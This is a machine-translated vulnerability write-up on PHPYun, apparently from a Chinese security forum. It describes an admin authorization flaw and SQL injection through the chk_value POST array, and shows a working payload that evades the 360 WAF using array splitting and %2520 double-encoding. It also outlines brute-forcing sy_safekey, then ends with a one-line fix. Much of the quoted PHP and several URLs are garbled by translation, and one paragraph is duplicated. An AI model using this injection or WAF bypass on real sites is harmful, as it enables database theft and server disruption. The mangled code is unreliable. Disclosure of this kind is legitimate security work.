Phpyun bypasses 360 difficult SQL injection and fixes

Phpyun bypasses 360 difficult SQL injection and fixes

It is really difficult to have an SQL injection in the PHP cloud.

I first discovered an SQL injection, which is not easy.

In phpyun/model/class/action. class. php
 

Function get_admin_user_shell () {if ($ _ SESSION ['auid'] & $ _ SESSION ['ashell ']) {$ row = $ this-> admin_get_user_shell ($ _ SESSION ['auid'], $ _ SESSION ['ashell ']); if (! $ Row) {$ this-> logout (); echo "operation not permitted! "; Die ;} if ($ _ GET ['M'] = "" | $ _ GET ['M'] = "index" | $ _ GET ['M'] = = "ajax" | $ _ GET ['M'] = "admin_nav ") {$ _ GET ['M'] = "admin_right";} $ c =$ _ GET ['C']; $ m =$ _ GET ['M']; if ($ _ GET ['M']! = "Admin_right") {$ url = $ _ GET ['M'] = "cache "? "Index. php? M = ". $ m." & c = ". $ c:" index. php? M = ". $ m; $ nav = $ this-> get_shell ($ row [" m_id "], $ url); if (! $ Nav) {$ this-> logout (); echo "operation not permitted! "; Die ;}} else {if ($ _ GET ['M']! = "") {$ This-> logout (); echo "does not have permission to operate! "; Die ;}}}

Note that

if($_GET['m']!=""){

Yes, as long as m is empty, this background operation can be operated by anyone. Exactly one operation has the SQL injection vulnerability.



In the code in/phpyun/admin/model/index. class. php

function shortcut_menu_action(){if($_POST['chk_value']){$this->obj->DB_update_all("admin_navigation","`menu`='1'","`menu`='2'");echo "`id` in(".@implode(',',$_POST['chk_value']).")";$this->obj->DB_update_all("admin_navigation","`menu`='2'","`id` in(".@implode(',',$_POST['chk_value']).")");echo 1;die;}}

$ _ POST ['chk _ value'] directly comes from POST and directly enters the SQL statement.



But if you want to POST the content, you still need pytoken. How can you get this.


 

Function admin () {$ r = $ this-> obj-> get_admin_user_shell (); $ this-> registrs (); if ($ _ POST) {if ($ _ POST ['pytoken']! = $ _ SESSION ['pytoken']) {unset ($ _ POST ['pytoken']); $ this-> obj-> ACT_layer_msg ("the source address is invalid! ", 3, $ this-> config ['sy _ weburl']) ;}} if (! $ _ SESSION ['pytoken']) {$ _ SESSION ['pytoken'] = substr (md5 (uniqid (). $ _ SESSION ['auid']. $ _ SESSION ['ausername']. $ _ SESSION ['ashell ']), 8, 12);} $ this-> yunset ('pytoken', $ _ SESSION ['pytoken']);}

Note that

If ($ _ POST ['pytoken']! = $ _ SESSION ['pytoken']) {unset ($ _ POST ['pytoken']); $ this-> obj-> ACT_layer_msg ("the source address is invalid! ", 3, $ this-> config ['sy _ weburl']);}

But there is no problem. On the login page, visit http: // localhost: 8038/phpyun/admin.


 

Well, the next step is the worst, with 360 defense.


 

 

Let's try the simplest or 1 = 1. See, it's 360. (I changed the 360 iframe page to echo to 360 characters ).

Check data/db. safety. php to find the corresponding code. How does one use bypass?


 

$postfilter = "<.*=(&#\\d+?;?)+?>|<.*data=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\\(\d+?|sleep\s*?\\([\d\.]+?\\)|load_file\s*?\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.+?\\*\\/|\\/\\*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?)|UPDATE(\\(.+\\)|\\s+?.+?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?)FROM(\\(.+\\)|\\s+?.+?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";

How can we bypass it? Simply put, we only need to bypass multiple arrays.


 

See, there is a new situation, or is replaced with Or.



The code for this part is as follows:


 

function gpc2sql($str) {if(preg_match("/select|insert|update|delete|union|into|load_file|outfile/is", $str)){exit(safe_pape());}$arr=array(" and "=>" an d "," or "=>" Ｏr ","%20"=>"","select"=>"Ｓelect","update"=>"Ｕpdate","count"=>"Ｃount","chr"=>"Ｃhr","truncate"=>"Ｔruncate","union"=>"Ｕnion","delete"=>"Ｄelete","insert"=>"Ｉnsert");foreach($arr as $key=>$v){    $str = preg_replace('/'.$key.'/isU',$v,$str);}

There are two ways to avoid replacement.



1, "% 20" => ""



Check, % 20 is replaced with null, we only need to submit
 

chk_value[]=1) o%2520r /*&chk_value[]=*/1=1#&pytoken=9a54d50f315b

% 2520 will be converted to % 20 by webserver, and % 20 will be deleted, leaving or.


 

 

We can do this only because or and can do this before the array of % 20, but select is not acceptable, so try method 2.

 

if($config['sy_istemplate']!='1' || md5(md5($config['sy_safekey']).$_GET['m'])!=$_POST['safekey'])

You only need to know sy_safekey to implement SQL injection and how to generate sy_safekey.


 

$r=rand(10000000,99999999);mysql_query("update $table_config set `config`='$r' where `name`='sy_safekey'");

If we want to cause the server to crash or query the current database environment, it is easy for us to easily sleep or obtain information about the currently running database, we can do all of these tasks that do not depend on the select character.



But if we want to do more things, we need to write a program, post safekey to http: // localhost: 8038 // phpyun/index. php? M = com & c = search & keyword = count, up to 79.99 million times until the returned count is count rather than Count, then you get sy_safekey, then you can do whatever you want.

If we want to cause the server to crash or query the current database environment, it is easy for us to easily sleep or obtain information about the currently running database, we can do all of these tasks that do not depend on the select character.

But if we want to do more things, we need to write a program, post safekey to http: // localhost: 8038 // phpyun/index. php? M = com & c = search & keyword = count, up to 79.99 million times until the returned count is count rather than Count, then you get sy_safekey, then you can do whatever you want.

Solution:

Intval after foreach